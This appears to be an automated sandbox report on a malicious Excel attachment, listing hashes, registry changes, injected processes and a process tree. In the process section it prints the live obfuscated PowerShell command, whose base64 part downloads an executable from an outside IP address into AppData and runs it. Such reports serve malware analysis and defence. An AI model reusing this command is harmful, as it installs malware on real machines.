Analysis
-
max time kernel
120s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07-07-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
inquiry MTO-PILZ-TF-8531.xls
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
inquiry MTO-PILZ-TF-8531.xls
Resource
win10v2004-20240704-en
General
-
Target
inquiry MTO-PILZ-TF-8531.xls
-
Size
430KB
-
MD5
996967065e5478555d9c4bf0838f6fd0
-
SHA1
8c07156945c2c55d61df66ff9ee0f2d6c598a6a4
-
SHA256
158644533c0c9683e8c8da4cfafd48eb05164ae25bb0e5f433ed23aec8a7464e
-
SHA512
39c11818eae917356cd178476c2b55c67ca209246e11f0115999ae50e5f7fc6adc1d375ff974ef8020ccb25a1ad474a094f20625db4f741c902fdcf182e1e18e
-
SSDEEP
12288:U6NCL1OGQpozwjTqCfgn+/doG59yeXWWeIgpWpKhNSB:U6NC5rFWWCfgnkdoG59ye5cIOS
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2284 1724 ktmutil.exe 27 -
Blocklisted process makes network request 3 IoCs
flow pid Process 8 2956 mshta.exe 9 2956 mshta.exe 11 2000 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2104 hkcmd.exe -
Loads dropped DLL 1 IoCs
pid Process 2000 powershell.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000017384-33.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2104 set thread context of 1596 2104 hkcmd.exe 39 PID 1596 set thread context of 1724 1596 svchost.exe 27 PID 1596 set thread context of 2284 1596 svchost.exe 40 PID 2284 set thread context of 1724 2284 ktmutil.exe 27 -
Detected phishing page
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \Registry\User\S-1-5-21-2297530677-1229052932-2803917579-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 ktmutil.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1724 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2000 powershell.exe 2000 powershell.exe 2000 powershell.exe 1596 svchost.exe 1596 svchost.exe 1596 svchost.exe 1596 svchost.exe 2284 ktmutil.exe 2284 ktmutil.exe 2284 ktmutil.exe 2284 ktmutil.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 2104 hkcmd.exe 1596 svchost.exe 1724 EXCEL.EXE 1724 EXCEL.EXE 2284 ktmutil.exe 2284 ktmutil.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2000 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2104 hkcmd.exe 2104 hkcmd.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 2104 hkcmd.exe 2104 hkcmd.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1724 EXCEL.EXE 1724 EXCEL.EXE 1724 EXCEL.EXE 1724 EXCEL.EXE 1724 EXCEL.EXE 1724 EXCEL.EXE 1724 EXCEL.EXE -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2956 wrote to memory of 2392 2956 mshta.exe 32 PID 2956 wrote to memory of 2392 2956 mshta.exe 32 PID 2956 wrote to memory of 2392 2956 mshta.exe 32 PID 2956 wrote to memory of 2392 2956 mshta.exe 32 PID 2392 wrote to memory of 2000 2392 cmd.exe 34 PID 2392 wrote to memory of 2000 2392 cmd.exe 34 PID 2392 wrote to memory of 2000 2392 cmd.exe 34 PID 2392 wrote to memory of 2000 2392 cmd.exe 34 PID 2000 wrote to memory of 1128 2000 powershell.exe 35 PID 2000 wrote to memory of 1128 2000 powershell.exe 35 PID 2000 wrote to memory of 1128 2000 powershell.exe 35 PID 2000 wrote to memory of 1128 2000 powershell.exe 35 PID 1128 wrote to memory of 820 1128 csc.exe 36 PID 1128 wrote to memory of 820 1128 csc.exe 36 PID 1128 wrote to memory of 820 1128 csc.exe 36 PID 1128 wrote to memory of 820 1128 csc.exe 36 PID 2000 wrote to memory of 2104 2000 powershell.exe 38 PID 2000 wrote to memory of 2104 2000 powershell.exe 38 PID 2000 wrote to memory of 2104 2000 powershell.exe 38 PID 2000 wrote to memory of 2104 2000 powershell.exe 38 PID 2104 wrote to memory of 1596 2104 hkcmd.exe 39 PID 2104 wrote to memory of 1596 2104 hkcmd.exe 39 PID 2104 wrote to memory of 1596 2104 hkcmd.exe 39 PID 2104 wrote to memory of 1596 2104 hkcmd.exe 39 PID 2104 wrote to memory of 1596 2104 hkcmd.exe 39 PID 1724 wrote to memory of 2284 1724 EXCEL.EXE 40 PID 1724 wrote to memory of 2284 1724 EXCEL.EXE 40 PID 1724 wrote to memory of 2284 1724 EXCEL.EXE 40 PID 1724 wrote to memory of 2284 1724 EXCEL.EXE 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\inquiry MTO-PILZ-TF-8531.xls"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\ktmutil.exe"C:\Windows\SysWOW64\ktmutil.exe"2⤵
- Process spawned unexpected child process
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2284
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C poWerShelL -eX BYpaSS -nOP -w 1 -c deVIceCRedentIaLdePLOYMENt.exE ; ieX($(iex('[SySTEm.tExt.encODing]'+[ChAR]0x3a+[Char]0X3A+'UtF8.GetSTRing([SYsTEM.CoNVERT]'+[chAr]58+[CHAr]58+'FROMBASe64StRiNG('+[CHar]34+'JFhrRFFCQTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVyZGVmSW5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVBYmJvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWRDb1hXYlUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWm9mY0ZJLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQW9KKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9NdENoRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5YRncgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYa0RRQkE0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC41LjE3LzY2MDU1L2lnY2N1LmV4ZSIsIiRFTnY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U3RhcnQtU0xFZXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaGtjbWQuZXhlIg=='+[CHar]0X22+'))')))"2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWerShelL -eX BYpaSS -nOP -w 1 -c deVIceCRedentIaLdePLOYMENt.exE ; ieX($(iex('[SySTEm.tExt.encODing]'+[ChAR]0x3a+[Char]0X3A+'UtF8.GetSTRing([SYsTEM.CoNVERT]'+[chAr]58+[CHAr]58+'FROMBASe64StRiNG('+[CHar]34+'JFhrRFFCQTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVyZGVmSW5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVBYmJvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWRDb1hXYlUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWm9mY0ZJLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQW9KKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9NdENoRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5YRncgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYa0RRQkE0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC41LjE3LzY2MDU1L2lnY2N1LmV4ZSIsIiRFTnY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U3RhcnQtU0xFZXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaGtjbWQuZXhlIg=='+[CHar]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vcqikgni.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AF4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6AF3.tmp"5⤵PID:820
-
-
-
C:\Users\Admin\AppData\Roaming\hkcmd.exe"C:\Users\Admin\AppData\Roaming\hkcmd.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\AppData\Roaming\hkcmd.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1596
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\66055[1].hta
Filesize8KB
MD5c2d38ffc92cb365472534e51ec747405
SHA17e92d52683b46eec235e66f18c1b414fc75643d6
SHA25682eeb1ac4df3cab27f9ea5b2a09b7c9993090bc33e9b0b8d9ae34673a0b3cd95
SHA512a5db53376ba44aa7e9b4a5f00c6061f4a6dd0ff9a73e46f6801cc9d79d98b305bc4a9ff6b7f4b622a77d9f9355705dd1c154266fd264f866c2fcdc2d101e1ba0
-
Filesize
1KB
MD522a7da98acc402b67f5f5836f1cc08a5
SHA151cf504a969959f6ce2ae8090dabaae4572f97c2
SHA256f624411e55f26055f84e8db54ac20fe0b8a666a458bfc2602a24ef139ca429eb
SHA51234639d4de7299acbd44217db185c8e4dbb0e68584820519d978f8be4a83d25a6fa6948c6d428c36573f4f8adbd50c75642024980aaa78ceee1805771fbba89c8
-
Filesize
264KB
MD523d91bc6f8608c8d788890539b6127f3
SHA1233692af0c89d215fb032d35c33190d19a581985
SHA2565cde9e3dbfa9f051254881198aac9e3d103fde3e63780ed53f6a53a12c0e3e8b
SHA512421d7eecce0d5b93067534ebe7c8108ffcbe5bc4bf8342d635879a4407479f10b52b4a09631ec6b970a1e5cf64f1b63c2c827ad19666c46c6ad7aac352a48c5c
-
Filesize
3KB
MD54a7b916bb3433d9a3ee0b65b461cabe8
SHA1abaa382b63c36c0bf70e2dcccf0bfd1c4e48db97
SHA256d07fdb7cb430c358506b90d6c60927f315db5ff2974da66825842c8fc95864c7
SHA51246bc2055a4ec8f2d483c148fcee31e217de32e4b0b9fc79efbc23ef96593532f4f36f4ca089833ed6ab2ed6aa3d01ca73a66de0b562e25a4faa0a18c8518c3e4
-
Filesize
7KB
MD547acdbd0f835508f9b9da38f6593b2a9
SHA16eb8b3c00c96e47e5fef2a098ed7ef0a392eee88
